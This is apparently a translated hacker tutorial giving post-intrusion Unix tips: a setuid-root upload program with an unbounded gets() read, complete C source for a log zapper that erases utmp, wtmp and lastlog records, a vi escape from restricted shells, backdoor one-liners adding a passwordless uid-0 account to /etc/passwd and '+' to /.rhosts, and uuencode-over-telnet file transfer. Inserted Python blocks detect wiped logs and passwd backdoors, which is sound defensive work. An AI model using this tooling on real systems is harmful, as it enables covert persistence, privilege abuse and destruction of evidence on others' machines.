Several common intrusion tips

Source: Internet
Author: User
1. Upload
Once the intrusion has succeeded and you have root, you can change the permissions on the server so that anyone can upload files.
As root, run the install script below; the resulting upload binary lets any user write a file into any directory.
# chmod 755 install
# ./install
$ more install
#!/bin/csh -f
cc upload.c
cp a.out upload
chown root upload
chmod 755 upload
chmod u+s upload
$ more upload.c
#include <stdio.h>

/* Copies up.txt to whatever path the user names. Because the binary is
   installed setuid root, the write is done with root's privileges. */
main()
{
    char filename[48];
    printf("This program will upload up.txt ASCII file to specified file\n");
    printf("XXX Copyright Reserved\n");
    printf("Where to upload (include path and filename)? ");
    gets(filename);          /* unbounded read into a 48-byte buffer */
    upload(filename);
}

int upload(filename)
char *filename;
{
    FILE *fp, *outp;
    int c;                   /* int so that every byte value and EOF are distinct */
    fp = fopen("up.txt", "r");
    outp = fopen(filename, "w");
    if (fp == NULL) {
        printf("file not exist.");
        return 0;
    }
    for (;;) {
        c = fgetc(fp);
        if (feof(fp)) break;
        printf("%c", c);     /* echo each byte as it is copied */
        fputc(c, outp);
    }
    fclose(fp);
    fclose(outp);
    return 1;
}
  
2. Destroying the scene (covering your tracks)
After getting into a system, how do you clean up the scene before leaving, that is, erase your footprints?
  
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
Use a dedicated editor for this.
  
Example:
  
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

/* Overwrite every utmp record whose ut_name matches "who" with zeros. */
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

    if ((f = open(UTMP_NAME, O_RDWR)) >= 0) {
        while (read(f, &utmp_ent, sizeof(utmp_ent)) > 0)
            if (!strncmp(utmp_ent.ut_name, who, strlen(who))) {
                bzero((char *)&utmp_ent, sizeof(utmp_ent));
                lseek(f, -(long)sizeof(utmp_ent), SEEK_CUR);
                write(f, &utmp_ent, sizeof(utmp_ent));
            }
        close(f);
    }
}

/* Walk wtmp backwards from the end and zero the most recent record for "who".
   The zeroed record stays in the file, which is exactly what a defender
   looks for: a real entry always carries a login time. */
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f = open(WTMP_NAME, O_RDWR)) >= 0) {

        while (pos != -1L) {
            lseek(f, -(long)(sizeof(struct utmp) * pos), L_XTND);
            if (read(f, &utmp_ent, sizeof(struct utmp)) < 0) {
                pos = -1L;
            } else {
                if (!strncmp(utmp_ent.ut_name, who, strlen(who))) {
                    bzero((char *)&utmp_ent, sizeof(struct utmp));
                    lseek(f, -(long)(sizeof(struct utmp) * pos), L_XTND);
                    write(f, &utmp_ent, sizeof(utmp_ent));
                    pos = -1L;
                } else pos += 1L;
            }
        }
        close(f);
    }
}

/* lastlog is indexed by uid: seek to the user's slot and zero it. */
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd = getpwnam(who)) != NULL) {

        if ((f = open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof(struct lastlog), 0);
            bzero((char *)&newll, sizeof(newll));
            write(f, (char *)&newll, sizeof(newll));
            close(f);
        }

    } else printf("%s: ?\n", who);
}

main(argc, argv)
int argc;
char *argv[];
{
    if (argc == 2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
        printf("Error.\n");
}
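As a defender's counterpart to the zapper above, the following added example (not code from the original article) scans a utmp/wtmp byte image for the all-zero records that in-place wipers leave behind, and for a file length that is not a whole number of records. The 48-byte record layout used for the constructed sample is an assumption; on a real host pass the platform's sizeof(struct utmp) and read the file from disk.

```python
import struct

# Assumed layout for the constructed sample only:
# ut_name 8 bytes, ut_line 8, ut_host 16, ut_time 4, 12 bytes padding.
RECORD_SIZE = 48


def pack_record(name, line, host, when):
    """Build one constructed record in the assumed 48-byte layout."""
    return struct.pack("<8s8s16sI12x",
                       name.encode(), line.encode(), host.encode(), when)


def scan_wtmp(data, record_size=RECORD_SIZE):
    """Report structural anomalies in a utmp/wtmp byte image.

    zeroed:    indices of records that are entirely NUL bytes. A genuine
               record always carries a login time, so an all-zero slot is
               the footprint of an in-place wipe, not a normal entry.
    truncated: True when the length is not a multiple of the record size,
               which points at hand editing or truncation of the file.
    """
    count, remainder = divmod(len(data), record_size)
    zeroed = [i for i in range(count)
              if data[i * record_size:(i + 1) * record_size]
              == b"\0" * record_size]
    return {"records": count, "zeroed": zeroed, "truncated": remainder != 0}


def build_sample():
    """Constructed wtmp image: three logins, the middle one wiped."""
    first = pack_record("alice", "ttyp0", "host1", 100)
    wiped = b"\0" * RECORD_SIZE          # what the zapper leaves behind
    third = pack_record("bob", "ttyp1", "host2", 300)
    return first + wiped + third


if __name__ == "__main__":
    print(scan_wtmp(build_sample()))
```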
  
3. Breaking out of a restricted shell
Many attacks on a system require the attacker to first have a command-line shell such as /bin/csh. Some systems, however, only give you a menu-style custom shell (such as pink), so to attack such a system you first have to break out of that custom shell.
Some commands of vi (the standard UNIX editor) can be used to do this. The steps are:
(1) Choose the "edit file" item in the custom shell, so that the system starts vi.
(2) In vi, enter the following command sequence (the leading ':' is part of each command):
:set shell=/bin/csh
:shell
(3) Just as choosing the DOS Shell item in a DOS program's File menu starts a command interpreter, the system now starts the shell that was just set, /bin/csh, and you have a command-line UNIX shell. Restricted editors such as rvi (or vim started with -Z) refuse :shell and :set shell for exactly this reason.
  
4. Backdoors
It is a good habit to leave a backdoor after getting into a system :) Here are some simple ones:
(1) setuid
# cp /bin/sh /tmp/.backdoor
# chmod u+s /tmp/.backdoor
Setting the suid bit on a copy of the shell is the easiest and most convenient.
(2) echo "wyj::0:0::/:/bin/csh" >> /etc/passwd
Adds an account with uid 0 (root) and no password to the system.
(3) echo "+ wyj" >> /.rhosts
That is, a user named wyj on any host can rlogin to the target without a password; the name wyj is in effect the password, and anyone who does not know it cannot get in. This requires the target to have port 512, 513 or 514 open.
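An added audit (not part of the original article) for the artefacts that backdoors (2) and (3) leave behind in /etc/passwd and .rhosts: extra uid-0 accounts, empty password fields, malformed entries, and '+' wildcards. The file contents are constructed samples; on a real host read the files from disk instead.

```python
def audit_passwd(text):
    """Return one finding per suspicious line of passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": lineno, "issue": "malformed", "entry": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append({"line": lineno, "issue": "uid 0 alias", "entry": name})
        if pw == "":
            findings.append({"line": lineno, "issue": "empty password", "entry": name})
    return findings


def audit_rhosts(text):
    """Return .rhosts lines that trust any host or any user via '+'."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if parts and "+" in parts:
            hits.append({"line": lineno, "entry": line.strip()})
    return hits


# Constructed samples, not real system files.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/sh\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "wyj::0:0::/:/bin/csh\n"          # the backdoor entry from (2)
    "broken:0:0://bin/csh\n"          # not seven fields: never a valid entry
)
SAMPLE_RHOSTS = "+ wyj\ntrusted.example.com alice\n"

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_rhosts(SAMPLE_RHOSTS):
        print(finding)
```

The setuid shell copies from (1) and from section 1 are found separately with a `find / -perm -4000 -type f` sweep, which this script does not replace.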
  
5. Uploading files with telnet
If ftp is disabled and sendmail is not usable either, how do you get the compiled file onto the host?
The method is simple:
1. Encode the file to be uploaded with uuencode. The result looks like the following:
The output consists entirely of printable ASCII characters.
2. Connect to the host with telnet and enter
$ cat > a
Then paste the encoded text from Windows into the telnet window and press ^D.
This creates file a in the current directory.
3. Run uudecode on a to restore the file, then chmod it.
  
  